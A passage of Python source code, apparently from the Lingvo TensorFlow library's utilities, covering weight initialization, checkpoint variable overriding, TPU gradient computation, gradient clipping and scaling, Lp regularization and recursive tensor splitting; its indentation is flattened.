fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = _DeterministicRandomNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-scale, maxval=scale)
elif method in ['uniform_positive']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=0., maxval=scale)
elif method in ['uniform_unit_scaling']:
v_init = _DeterministicRandomUniformUnitScalingInitializer(
seed=seed, factor=scale)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = _DeterministicRandomVarianceScalingInitializer(
scale=scale, mode='fan_avg', distribution='uniform', seed=seed)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = _DeterministicRandomTruncatedNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
v_init = _DeterministicRandomXavierUniformInitializer(method, scale, seed)
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-bound, maxval=bound)
elif method in ['custom', 'custom_constant']:
v_init = custom_v_init
else:
assert False, 'init_type %s not supported.' % method
return v_init
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
# module load time, because it let's us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.stack.append(global_step_tensor)
try:
yield
finally:
_GLOBAL_STEP_STACK.stack.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK.stack:
return _GLOBAL_STEP_STACK.stack[-1]
return tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(GetGlobalVariableScope(), use_resource=True):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.train.get_or_create_global_step()
else:
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
A `.NestedMap` of identity() wrapped theta
"""
class AddIdentity:
"""Helper class."""
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars,
variable_loading_rules,
var_ignore_rules,
ckpt_path,
suppress_logging=False):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
unused_rules = {
regexp: name_format for regexp, name_format in variable_loading_rules
}
vars_to_load = []
for model_var in all_vars:
loaded = False
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match:
if not suppress_logging:
tf.logging.debug('Loading rules do not match %s.', model_var.name)
continue
elif any(re.match(r, model_var.name) for r in var_ignore_rules):
if not suppress_logging:
tf.logging.debug('Ignoring %s from loading.', model_var.name)
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
if not suppress_logging:
tf.logging.info('Loading %s from %s with regexp: %s', model_var.name,
checkpoint_var_name, regexp)
vars_to_load.append((checkpoint_var_name, model_var))
unused_rules.pop(regexp, None)
loaded = True
break
if not loaded and not suppress_logging:
tf.logging.info(
'Not loading model variable %s from %s as it does not match any rules'
' or matches ignored', model_var.name, ckpt_path)
if not suppress_logging:
for regexp, name_format in unused_rules.items():
tf.logging.warning(f'User provided rule matched no variables: ({regexp}, '
f'{name_format})')
return vars_to_load
def OverrideVarsFromCheckpoint(all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Add TF graph ops to override variables from a provided checkpoint.
Args:
all_vars: List of all the parameters in the model.
checkpoint_path: A path to the checkpoints of a pretrained model.
variable_loading_rules: A list of tuples of strings defining (regex to match
parameter names in the model to override, format string to determine the
corresponding var in the checkpoint).
var_ignore_rules: A list consisting of a list of regexes to match parameter
names in the model which should not be overridden, even if they match
those in the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from the provided checkpoint.
"""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules, checkpoint_path)
if not vars_to_load:
all_rules_text = '\n'.join(
[f'{k} --> {v}' for k, v in variable_loading_rules])
raise ValueError(f'Variable loading rules {all_rules_text} '
f'did not match any of {len(all_vars)} vars.')
load_var_names = '\n'.join(sorted([v.name for _, v in vars_to_load]))
tf.logging.info(f'Overriding {len(vars_to_load)} vars from '
f'{checkpoint_path}:\n{load_var_names}')
savers = []
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
savers.append(tf.train.Saver(var_list=unique_vars_to_load, sharded=True))
vars_to_load = remaining_vars_to_load
def _Restore(sess):
for saver in savers:
saver.restore(sess, checkpoint_path)
return _Restore
def OverrideVarsFromCheckpoints(all_vars, ckpts_loading_rules):
"""Add TF graph ops to override model variables from checkpoints.
Args:
all_vars: List of all the parameters in the model.
ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
Checkpoint path must be a path to a pretrained model, and loading rules is
expected to be a tuple of two lists. The first consisting of tuples of
strings defining (regex to match parameter names in the model to override,
format string to determine the corresponding var in the checkpoint), and
the second list consisting of a list of regexes to match parameter names
in the model which should not be overridden, even if they match those in
the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from checkpoint and return a list of overwritten variables.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
var_names_overridden = set()
restore_fns = []
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
to_load_vars = _GetVarsToLoad(
all_vars,
loading_rules[0],
loading_rules[1],
ckpt_path,
suppress_logging=True)
var_refs_to_override = [var[1].ref() for var in to_load_vars]
var_names_to_override = [var[1].name for var in to_load_vars]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
restore_fns.append(
OverrideVarsFromCheckpoint(all_vars, ckpt_path, loading_rules[0],
loading_rules[1]))
var_refs_overridden.update(var_refs_to_override)
var_names_overridden.update(var_names_to_override)
def _Restore(sess):
for fn in restore_fns:
fn(sess)
tf.logging.info('Model variables overridden: %s', var_names_overridden)
return var_names_overridden
return _Restore
def ComputeGradientsSimple(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
activations_grad=None):
"""Compute gradients."""
tape = _GRADIENT_TAPE_STACK.stack[-1] if _GRADIENT_TAPE_STACK.stack else None
if IsEagerMode() and tape:
tf.logging.info('ComputeGradientsSimple: using gradient tape.')
if activations_grad is not None:
raise ValueError('GradientTape does not accept gradient input values.')
if grad_aggregation_method or colocate_gradients_with_ops or gate_gradients:
tf.logging.warning(
'When GradientTape is used, these field will be ignored: '
f'grad_aggregation_method ({grad_aggregation_method}), '
f'colocate_gradients_with_ops ({colocate_gradients_with_ops}), '
f'gate_gradients ({gate_gradients}).')
return tape.gradient(
loss_or_activations,
all_vars,
unconnected_gradients=tf.UnconnectedGradients.NONE)
return tf.gradients(
loss_or_activations,
all_vars,
grad_ys=activations_grad,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def _ComputeGradientsTpu(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients for local loss across whole TPU cluster.
This implementation specializes for the case where weight params maybe used
for different number of times in the forward computation, so that gradients
should be normalized by the actual number of times they are being computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss_or_activations: The loss or activations to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This helps reducing the number of gradient all-reduces
when doing gradient accumulation, which does gradient cross replica sum
only every k steps in a tf.cond. Currently this works only when
skip_zero_gradients is None.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
Gradients to be passed back. If tpu_embedding_activations is set, their
gradients will be placed at the end.
Raises:
ValueError: upon invalid arguments.
"""
if is_activations:
assert activations_grad is not None
if not skip_zero_gradients and not is_activations:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss_or_activations *= tf.constant(
1.0 / shards, dtype=loss_or_activations.dtype)
else:
assert not tpu_embedding_activations, (
'Gradient computation for tpu embedding activations requires proper '
'loss scaling, and so is not compatible with skip_zero_gradients and '
'is_activations.')
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(
loss_or_activations=loss_or_activations,
all_vars=all_vars +
(tpu_embedding_activations if tpu_embedding_activations else []),
grad_aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients,
activations_grad=activations_grad)
if tpu_embedding_activations:
# Note we don't need to aggregate TPU embedding gradients below.
tpu_embedding_grads = all_grads[len(all_vars):]
all_grads = all_grads[:len(all_vars)]
else:
tpu_embedding_grads = []
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
if use_bf16_gradients_ar:
g = tf.cast(g, tf.bfloat16)
with tf.ops.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
if defer_crs_to_apply_grad:
normalized_g = tf.convert_to_tensor(g)
else:
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads + tpu_embedding_grads
class _VarGrad(typing.NamedTuple):
var: tf.Tensor
grad: Union[tf.Tensor, tf.IndexedSlices]
scale: Optional[tf.Tensor] = None
class VarGrad:
"""A class that holds a variable and a gradient.
This does not inherit from namedtuple so that tf.nest operations do not
recurse into it.
"""
def __init__(self, *args, **kwargs):
self._var_grad = _VarGrad(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
if self._var_grad.scale is None:
return iter((self._var_grad.var, self._var_grad.grad))
return iter(self._var_grad)
def __repr__(self):
return repr(self._var_grad)
def SkipNoneGradients(var_grads):
"""Removes pairs whose grad is None."""
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
def ComputeGradients(
loss_or_activations,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
skip_none_gradients=True,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss_or_activations: either the loss, which is a scalar tensor, or
activations, which could be a tensor or a list of tensors.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
operations. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
sparsely activated networks or switchable layers in neural architectural
search. Only applicable on TPU.
Possible values are:
- None: do not skip zero gradients;
- `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
- `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce. This applies to TPU only.
skip_none_gradients: Whether to skip gradients that are None.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This applies to TPU only.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
If tpu_embedding_activations is set, a sub `.NestedMap` named
tpu_embedding_var_grads will be used to store the VarGrads for the
activations. In this case, key is the feature name, and var in the VarGrad
is the activation tensor (not a real variable).
"""
if not is_activations:
loss_or_activations = HasRank(loss_or_activations, 0)
if not tpu_embedding_activations:
tpu_embedding_activations = NestedMap()
assert isinstance(tpu_embedding_activations, NestedMap)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss_or_activations'.
# This doesn't work if the training loop is wrapped inside a tf.function,
# since all variables will be lifted out and trainable_variables will be
# empty. In that case we skip the check.
trainable_variables = set([v.ref() for v in tf.trainable_variables()])
if trainable_variables:
def Needed(v):
if isinstance(v, tf.Variable):
if v.ref() not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
assert not tpu_embedding_activations
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu,
skip_zero_gradients=skip_zero_gradients,
use_bf16_gradients_ar=use_bf16_gradients_ar,
defer_crs_to_apply_grad=defer_crs_to_apply_grad,
activations_grad=activations_grad,
is_activations=is_activations,
tpu_embedding_activations=tpu_embedding_activations.Flatten())
else:
assert not tpu_embedding_activations
take_grad = ComputeGradientsSimple
grads = take_grad(loss_or_activations, filtered_vlist,
grad_aggregation_method, colocate_gradients_with_ops,
gate_gradients)
if tpu_embedding_activations:
tpu_embedding_grads = grads[len(filtered_vlist):]
grads = grads[:len(filtered_vlist)]
else:
tpu_embedding_grads = None
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
if skip_none_gradients:
var_grads = SkipNoneGradients(var_grads)
if tpu_embedding_grads:
# Create VarGrads for TPU embedding activations in a dedicated sub map.
assert 'tpu_embedding_var_grads' not in var_grads
tpu_embedding_activation_list = tpu_embedding_activations.Flatten()
tpu_embedding_var_grads = [
VarGrad(v, g)
for v, g in zip(tpu_embedding_activation_list, tpu_embedding_grads)
]
tpu_embedding_var_grads = tpu_embedding_activations.Pack(
tpu_embedding_var_grads)
# Replace None gradients with zeros, since TPU embedding expect all
# activations to have gradients.
def _NoneToZeros(key, var_grad):
if var_grad.grad is None:
tf.logging.warning(
f'TPU embedding gradient for feature {key} is None. Replacing with '
'zeros.')
return VarGrad(var_grad.var, tf.zeros_like(var_grad.var))
return var_grad
var_grads.tpu_embedding_var_grads = (
tpu_embedding_var_grads.TransformWithKey(_NoneToZeros))
return var_grads
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var: tf.Tensor, grad: tf.Tensor,
scale: tf.Tensor) -> tf.Tensor:
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item: VarGrad) -> VarGrad:
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any(
[HasNanOrInf(tf.math.real(x)),
HasNanOrInf(tf.math.imag(x))])
return tf.reduce_any(
tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x)))
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return not _VarInCollection(v, tf.get_collection(SKIP_LP_REGULARIZATION))
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
v_name = v.name if not tf.executing_eagerly() else '[eager]'
tf.logging.info('AdjustGradientsWithLpLoss: %s', v_name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
# Note: IndexedSlces appears for embedding lookups.
# Embedding lookup ids can have duplicate. For duplicated ids, we
# only want to consider once for each ids.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
# Counts is a vector of size vocab_size. counts[i] is i-th words
# occurrences in 'ids'.
counts = tf.math.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.math.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif not _VarInCollection(var, tf.get_collection(SKIP_LP_REGULARIZATION)):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
x: a Tensor, or a list or NestMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in x.items():
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
sum_reduction_fn: called to reduce the values and weights to single value
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
# divide_no_nan only supports tf.{float,complex}*.
dtype = values.dtype if values.dtype is tf.float64 else tf.float32
avg = tf.math.divide_no_nan(
sum_reduction_fn(tf.cast(values, dtype) * tf.cast(weights, dtype)),
tf.cast(total_weight, dtype))
return tf.cast(avg, values.dtype), total_weight
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
ret_dict - dictionary of weighted averages of each metrics.
"""
